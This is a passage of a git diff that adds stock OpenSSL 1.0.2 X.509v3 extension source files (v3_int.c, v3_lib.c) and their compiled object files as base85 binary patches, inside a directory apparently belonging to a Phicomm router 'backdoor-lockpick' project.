zlB@U1OTg6}ly5A5<HFCn@P7iw`A<tDIa&Tk@+ia=MR8U;p^dg})}4=Lo7+ZRdK~rj
zQ6oF18-~LvPA_M_hCQKFM;LDrytOgCE7cRzQhHBkXMZBCr?prrp|kQPy-*p$LL3|!
zPOvM{o#+G2Zf$KsC}g*QQa%rzhOYH@NA#Z9ml7Rm*3q}VH{GL;W%6)hWQo2$eY|4m
z*;1)kVzGfvy=;{7!{b|P^^Bp$Y%FE7Ob3n3@FsmYw@Kfa8O=K_Mkvlds>1r2n2Lyl
zP#VDqigRw=nYN|{3b2Hc%PWC`(=-a%EyN$TAY|i}a*n|whjS%{`$q$(XD6_$fa`~F
z>BfZ7RvdanL@6^eVns<G$ru@7sW`6J7U6hycS{3nNgrZ}Sc;RrHG|Q%j8lXJCVNlv
z0QaJ9>ClFhFXLB<%6<GjsNXrB`S3USZ}}aO!cGw6_?4`<jt~U-HE=1OM+k!aTDTO)
zzYb9BcD`j{!CRoN^k0-5ezvTM@Yf_qJNQ?N(#Q7|3i9jWQXJn)D9CSsOL2TJp`d+y
z?kIi>(Z_SG;%zScZo+RO`a^^-BYcPC=r=(4UKjqf3xCdq&q|K#rSZQO9fH{7b35U5
z{$avtJ|qaI`LLGo&ww8lw?V@3%%}KcgfA!jX~O9~zCrjMME|_xSkOGVK=f&zES2va
zjKgP%om&ZCK{zLz&S$;k=w=Dge~9R>Bzz;`G|uD1&do%Bg6M|`pCX**)sKjsFwsBk
z!e4daZ@TbV$uVws68pPIzTHCjQ-t42_%np#H-yTE7YV<e@aKqMYUe27)Xpynr*{58
zIGv|DbD(?t3W>snf-yuvj^D(X>nQ82;u6OkLKzfyOFtm%SnQK^v_rpI4ib*`)${ix
z;c5;7p#cyqWNM4H&&JjF7$=<C*-1FH^Ms8nJNQgS!ET)Am$3m75O<5;CF@v3WnJm_
z$u=i^wX9<ikae63osW8tC_aG(L3WC}rHg%P-cQ-MI^Q3#@dMJ%Pi$PR*C+dxUv)md
z(Z<y|IBetU92~cCbq-!<<LVsDLglSvMrH^~qhysiRV!ulnUIm4fMcULlZ1xKWfm$G
zv4QH55F8_gk|0on&Jg}ln4iyCXt+2wmMws>Lea>E;Lo0w;-n|r4;Lz-@ltU-TQauF
z(b*iFKHzUj8M2R51Yk6Vp!S7fnTuKlyC{FBvMF>`9ZP(N<1;7<7nL*3R_i_N1i^O!
z`oZ5cippbrHzBvVVXNgh)TJV~>k`6u1KPaO@evq{HrwE$qWnKVA=H(BRVE~}`~QKQ
zzshfACZH;^j6&%Yzf<x77m$uHez-^W_-z1&Dt7;aazlHek4k_xppMT^C;#u^ArfRz
z+^zjX-**3x07L)unTA6SO8@G4j0{D^O_gQBgo3=Cmg6bIx*DhWBvcl{h0g~nXXN+*
zg-}=XSNMBSL7VpR!YJ^Z&7pn#cR<G}e(UhC2cn)|xPSPsmm06~-_bYd<)q>`KIB30
r=k!Uq?BhQM%)a-4*eUrJTcfShwj6O*vZ>&3HYg|fL(!_;?Bo9npUCUa

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_int.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_int.c
new file mode 100644
index 0000000..8bfdb37
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_int.c
@@ -0,0 +1,92 @@
+/* v3_int.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/x509v3.h>
+
+const X509V3_EXT_METHOD v3_crl_num = {
+    NID_crl_number, 0, ASN1_ITEM_ref(ASN1_INTEGER),
+    0, 0, 0, 0,
+    (X509V3_EXT_I2S)i2s_ASN1_INTEGER,
+    0,
+    0, 0, 0, 0, NULL
+};
+
+const X509V3_EXT_METHOD v3_delta_crl = {
+    NID_delta_crl, 0, ASN1_ITEM_ref(ASN1_INTEGER),
+    0, 0, 0, 0,
+    (X509V3_EXT_I2S)i2s_ASN1_INTEGER,
+    0,
+    0, 0, 0, 0, NULL
+};
+
+static void *s2i_asn1_int(X509V3_EXT_METHOD *meth, X509V3_CTX *ctx,
+                          char *value)
+{
+    return s2i_ASN1_INTEGER(meth, value);
+}
+
+const X509V3_EXT_METHOD v3_inhibit_anyp = {
+    NID_inhibit_any_policy, 0, ASN1_ITEM_ref(ASN1_INTEGER),
+    0, 0, 0, 0,
+    (X509V3_EXT_I2S)i2s_ASN1_INTEGER,
+    (X509V3_EXT_S2I)s2i_asn1_int,
+    0, 0, 0, 0, NULL
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_int.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_int.o
new file mode 100644
index 0000000000000000000000000000000000000000..cbae7855123d2355c4fd8939f710e878ba38aa0e
GIT binary patch
literal 2456
zcmchZPiqrV5Wpu%wN-1=f?%N{If<fuB(3=GP|}t(6+#Ma3O$I=O}d(3vnjhT(u&mH
zRPf-@kKnN%!K0r*{0f2>>7|HJXLjc$FE1Mp7CW%a%x~w<`?oK7T_`Oj6A93gfH~-T
zngV<~)3x)VnTIrt!D0I9ujO}NzjxpET0fG#{%L#fPrISjZ^QEcn_FC5e2}@mUTu4-
zow+Y&MRq!Ow;j5<y_u}Y-o6pxXaqy3#_^$TEtb~-x9Kyn6h0)EA_a+;tB}|kPfU#t
zk9@#`LHr888)f}BMQ3RUejdlgq+(ARjX{s1H!FpeY&nl0Y1A>tlnQ5OXHfl-euyLm
z=LT@<(l03(?t_<+(7M_(jUbNCA)heDS?9#^fcVD)c#G@oqbAXHUZEY<=Z{)*crhy*
zo)R?(W*X87yd1e8i=~x?`I1~&T3RbqWMzJ#RFGlF{8~9DAC@bHVqrB(t~aU;B^_^f
z8_buop`bAnNRv^*rn{vaS@XBZK_$I*6FNIVJ4<`_`#2K4Lp1C$e6(cQAfDC`^*w`|
zSI%35n{^HhZq^y$b?WPDa5Fx`b*QJ=7euhzR8AGO@*`c>mhWykLb*E%#HOPh5Y-?6
z5mNHW5`GIrt<`M0xGBPGDOccEIvpsd_MH7^UR!MYt!>v=yPWOT<x}5jx;&<ns0=34
zl+Rj4^6Z=686jRCehV;#7VT-iLn33JKjBH{REKi)ertY>xqTCqIL}sg|65%1U-Rz_
z=>LQp*R6&b=33>@h@1aMp8qEfr1{ewY|noY8MV;o9nDa_aNnC6u-3!Tn$}6%X6RuY
zjEQ}OjBdA{GmZWc=V#D1MUP)Ig$9M%`I8LndD;1NpT(_Tp8tpFb3*G!x3kXIJgzr}
t!7}$h;CWm`b|EI8ehKWeg9wfoz9GjDF4rLwXvO7k@c8#Sk&$8N{{dsrk8c0~

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_lib.c
new file mode 100644
index 0000000..8350429
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_lib.c
@@ -0,0 +1,363 @@
+/* v3_lib.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* X509 v3 extension utilities */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/x509v3.h>
+
+#include "ext_dat.h"
+
+static STACK_OF(X509V3_EXT_METHOD) *ext_list = NULL;
+
+static int ext_cmp(const X509V3_EXT_METHOD *const *a,
+                   const X509V3_EXT_METHOD *const *b);
+static void ext_list_free(X509V3_EXT_METHOD *ext);
+
+int X509V3_EXT_add(X509V3_EXT_METHOD *ext)
+{
+    if (!ext_list && !(ext_list = sk_X509V3_EXT_METHOD_new(ext_cmp))) {
+        X509V3err(X509V3_F_X509V3_EXT_ADD, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    if (!sk_X509V3_EXT_METHOD_push(ext_list, ext)) {
+        X509V3err(X509V3_F_X509V3_EXT_ADD, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    return 1;
+}
+
+static int ext_cmp(const X509V3_EXT_METHOD *const *a,
+                   const X509V3_EXT_METHOD *const *b)
+{
+    return ((*a)->ext_nid - (*b)->ext_nid);
+}
+
+DECLARE_OBJ_BSEARCH_CMP_FN(const X509V3_EXT_METHOD *,
+                           const X509V3_EXT_METHOD *, ext);
+IMPLEMENT_OBJ_BSEARCH_CMP_FN(const X509V3_EXT_METHOD *,
+                             const X509V3_EXT_METHOD *, ext);
+
+const X509V3_EXT_METHOD *X509V3_EXT_get_nid(int nid)
+{
+    X509V3_EXT_METHOD tmp;
+    const X509V3_EXT_METHOD *t = &tmp, *const *ret;
+    int idx;
+    if (nid < 0)
+        return NULL;
+    tmp.ext_nid = nid;
+    ret = OBJ_bsearch_ext(&t, standard_exts, STANDARD_EXTENSION_COUNT);
+    if (ret)
+        return *ret;
+    if (!ext_list)
+        return NULL;
+    idx = sk_X509V3_EXT_METHOD_find(ext_list, &tmp);
+    if (idx == -1)
+        return NULL;
+    return sk_X509V3_EXT_METHOD_value(ext_list, idx);
+}
+
+const X509V3_EXT_METHOD *X509V3_EXT_get(X509_EXTENSION *ext)
+{
+    int nid;
+    if ((nid = OBJ_obj2nid(ext->object)) == NID_undef)
+        return NULL;
+    return X509V3_EXT_get_nid(nid);
+}
+
+int X509V3_EXT_free(int nid, void *ext_data)
+{
+    const X509V3_EXT_METHOD *ext_method = X509V3_EXT_get_nid(nid);
+    if (ext_method == NULL) {
+        X509V3err(X509V3_F_X509V3_EXT_FREE,
+                  X509V3_R_CANNOT_FIND_FREE_FUNCTION);
+        return 0;
+    }
+
+    if (ext_method->it != NULL)
+        ASN1_item_free(ext_data, ASN1_ITEM_ptr(ext_method->it));
+    else if (ext_method->ext_free != NULL)
+        ext_method->ext_free(ext_data);
+    else {
+        X509V3err(X509V3_F_X509V3_EXT_FREE,
+                  X509V3_R_CANNOT_FIND_FREE_FUNCTION);
+        return 0;
+    }
+
+    return 1;
+}
+
+int X509V3_EXT_add_list(X509V3_EXT_METHOD *extlist)
+{
+    for (; extlist->ext_nid != -1; extlist++)
+        if (!X509V3_EXT_add(extlist))
+            return 0;
+    return 1;
+}
+
+int X509V3_EXT_add_alias(int nid_to, int nid_from)
+{
+    const X509V3_EXT_METHOD *ext;
+    X509V3_EXT_METHOD *tmpext;
+
+    if (!(ext = X509V3_EXT_get_nid(nid_from))) {
+        X509V3err(X509V3_F_X509V3_EXT_ADD_ALIAS,
+                  X509V3_R_EXTENSION_NOT_FOUND);
+        return 0;
+    }
+    if (!
+        (tmpext =
+         (X509V3_EXT_METHOD *)OPENSSL_malloc(sizeof(X509V3_EXT_METHOD)))) {
+        X509V3err(X509V3_F_X509V3_EXT_ADD_ALIAS, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    *tmpext = *ext;
+    tmpext->ext_nid = nid_to;
+    tmpext->ext_flags |= X509V3_EXT_DYNAMIC;
+    return X509V3_EXT_add(tmpext);
+}
+
+void X509V3_EXT_cleanup(void)
+{
+    sk_X509V3_EXT_METHOD_pop_free(ext_list, ext_list_free);
+    ext_list = NULL;
+}
+
+static void ext_list_free(X509V3_EXT_METHOD *ext)
+{
+    if (ext->ext_flags & X509V3_EXT_DYNAMIC)
+        OPENSSL_free(ext);
+}
+
+/*
+ * Legacy function: we don't need to add standard extensions any more because
+ * they are now kept in ext_dat.h.
+ */
+
+int X509V3_add_standard_extensions(void)
+{
+    return 1;
+}
+
+/* Return an extension internal structure */
+
+void *X509V3_EXT_d2i(X509_EXTENSION *ext)
+{
+    const X509V3_EXT_METHOD *method;
+    const unsigned char *p;
+
+    if (!(method = X509V3_EXT_get(ext)))
+        return NULL;
+    p = ext->value->data;
+    if (method->it)
+        return ASN1_item_d2i(NULL, &p, ext->value->length,
+                             ASN1_ITEM_ptr(method->it));
+    return method->d2i(NULL, &p, ext->value->length);
+}
+
+/*-
+ * Get critical flag and decoded version of extension from a NID.
+ * The "idx" variable returns the last found extension and can
+ * be used to retrieve multiple extensions of the same NID.
+ * However multiple extensions with the same NID is usually
+ * due to a badly encoded certificate so if idx is NULL we
+ * choke if multiple extensions exist.
+ * The "crit" variable is set to the critical value.
+ * The return value is the decoded extension or NULL on
+ * error. The actual error can have several different causes,
+ * the value of *crit reflects the cause:
+ * >= 0, extension found but not decoded (reflects critical value).
+ * -1 extension not found.
+ * -2 extension occurs more than once.
+ */
+
+void *X509V3_get_d2i(STACK_OF(X509_EXTENSION) *x, int nid, int *crit,
+                     int *idx)
+{
+    int lastpos, i;
+    X509_EXTENSION *ex, *found_ex = NULL;
+    if (!x) {
+        if (idx)
+            *idx = -1;
+        if (crit)
+            *crit = -1;
+        return NULL;
+    }
+    if (idx)
+        lastpos = *idx + 1;
+    else
+        lastpos = 0;
+    if (lastpos < 0)
+        lastpos = 0;
+    for (i = lastpos; i < sk_X509_EXTENSION_num(x); i++) {
+        ex = sk_X509_EXTENSION_value(x, i);
+        if (OBJ_obj2nid(ex->object) == nid) {
+            if (idx) {
+                *idx = i;
+                found_ex = ex;
+                break;
+            } else if (found_ex) {
+                /* Found more than one */
+                if (crit)
+                    *crit = -2;
+                return NULL;
+            }
+            found_ex = ex;
+        }
+    }
+    if (found_ex) {
+        /* Found it */
+        if (crit)
+            *crit = X509_EXTENSION_get_critical(found_ex);
+        return X509V3_EXT_d2i(found_ex);
+    }
+
+    /* Extension not found */
+    if (idx)
+        *idx = -1;
+    if (crit)
+        *crit = -1;
+    return NULL;
+}
+
+/*
+ * This function is a general extension append, replace and delete utility.
+ * The precise operation is governed by the 'flags' value. The 'crit' and
+ * 'value' arguments (if relevant) are the extensions internal structure.
+ */
+
+int X509V3_add1_i2d(STACK_OF(X509_EXTENSION) **x, int nid, void *value,
+                    int crit, unsigned long flags)
+{
+    int extidx = -1;
+    int errcode;
+    X509_EXTENSION *ext, *extmp;
+    unsigned long ext_op = flags & X509V3_ADD_OP_MASK;
+
+    /*
+     * If appending we don't care if it exists, otherwise look for existing
+     * extension.
+     */
+    if (ext_op != X509V3_ADD_APPEND)
+        extidx = X509v3_get_ext_by_NID(*x, nid, -1);
+
+    /* See if extension exists */
+    if (extidx >= 0) {
+        /* If keep existing, nothing to do */
+        if (ext_op == X509V3_ADD_KEEP_EXISTING)
+            return 1;
+        /* If default then its an error */
+        if (ext_op == X509V3_ADD_DEFAULT) {
+            errcode = X509V3_R_EXTENSION_EXISTS;
+            goto err;
+        }
+        /* If delete, just delete it */
+        if (ext_op == X509V3_ADD_DELETE) {
+            if (!sk_X509_EXTENSION_delete(*x, extidx))
+                return -1;
+            return 1;
+        }
+    } else {
+        /*
+         * If replace existing or delete, error since extension must exist
+         */
+        if ((ext_op == X509V3_ADD_REPLACE_EXISTING) ||
+            (ext_op == X509V3_ADD_DELETE)) {
+            errcode = X509V3_R_EXTENSION_NOT_FOUND;
+            goto err;
+        }
+    }
+
+    /*
+     * If we get this far then we have to create an extension: could have
+     * some flags for alternative encoding schemes...
+     */
+
+    ext = X509V3_EXT_i2d(nid, crit, value);
+
+    if (!ext) {
+        X509V3err(X509V3_F_X509V3_ADD1_I2D,
+                  X509V3_R_ERROR_CREATING_EXTENSION);
+        return 0;
+    }
+
+    /* If extension exists replace it.. */
+    if (extidx >= 0) {
+        extmp = sk_X509_EXTENSION_value(*x, extidx);
+        X509_EXTENSION_free(extmp);
+        if (!sk_X509_EXTENSION_set(*x, extidx, ext))
+            return -1;
+        return 1;
+    }
+
+    if (!*x && !(*x = sk_X509_EXTENSION_new_null()))
+        return -1;
+    if (!sk_X509_EXTENSION_push(*x, ext))
+        return -1;
+
+    return 1;
+
+ err:
+    if (!(flags & X509V3_ADD_SILENT))
+        X509V3err(X509V3_F_X509V3_ADD1_I2D, errcode);
+    return 0;
+}
+
+IMPLEMENT_STACK_OF(X509V3_EXT_METHOD)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..78fd272525a37d8904cd8abc28dea30dfbf5caa9
GIT binary patch
literal 8856
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

literal 0
HcmV?d00001

